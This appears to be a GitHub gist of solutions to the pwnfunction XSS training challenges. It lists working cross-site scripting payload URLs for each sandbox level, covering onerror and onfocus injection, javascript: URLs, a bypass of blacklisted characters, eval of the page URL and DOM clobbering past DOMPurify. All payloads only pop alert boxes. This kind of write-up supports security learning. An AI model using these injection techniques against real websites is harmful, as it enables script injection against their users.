diofeher/xss.pwnfunctions.md

Last active August 16, 2024 19:33

Star () You must be signed in to star a gist
Fork () You must be signed in to fork a gist

Learn more about clone URLs
Clone this repository at <script src="https://gist.github.com/diofeher/091a911dcdcdb6e239d460776106d994.js"></script>
Save diofeher/091a911dcdcdb6e239d460776106d994 to your computer and use it in GitHub Desktop.

Download ZIP

Raw

xss.pwnfunctions.md

Solutions of https://xss.pwnfunction.com/

Touch Ma Spaghet

Dom-Based XSS

https://sandbox.pwnfunction.com/warmups/ma-spaghet.html?somebody=%3Cimg%20src=%22x%22%20onerror=%22alert(1337)%22%20/%3E

JEFFF

String Interpolation

https://sandbox.pwnfunction.com/warmups/jefff.html?jeff=%27te%22%2balert(1)%2b%22%27

Ugandan Knuckles

AutoFocus+onFocus on Input Text

https://sandbox.pwnfunction.com/warmups/da-wey.html?wey=%22%20onfocus=%22alert(1)%22%20autofocus=%22

Me and the boys

Form Action="javascript:alert(1)"

https://sandbox.pwnfunction.com/warmups/me-and-the-boys.html?joinBoys=True&boys=javascript:alert(1)

Ah that's Hawt

Html Encoding Chars + URL Encoded

Blacklist: ( ` ) \

https://sandbox.pwnfunction.com/warmups/thats-hawt.html?markassbrownlee=%3Cimg%20src=x%20onerror=%27alert%26%2340%201337%20%26%2341%27%20/%3E

Ligma

Using JSFuck to eval source: alert(1337) -> URLEncode the result

link to the exploit

Mafia

Used alert in another attribute

https://sandbox.pwnfunction.com/warmups/mafia.html?pwn=alert(1337)&mafia=eval(location.href.slice(55,66))

Boomer

Dom Clobbering with DomPurify (this one I had to look, didn't know this technique -> toString on setTimeout)

https://sandbox.pwnfunction.com/warmups/ok-boomer.html?boomer=%3Ca%20id=ok%20href=%22cid:alert(1337)%22%20/%3E

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment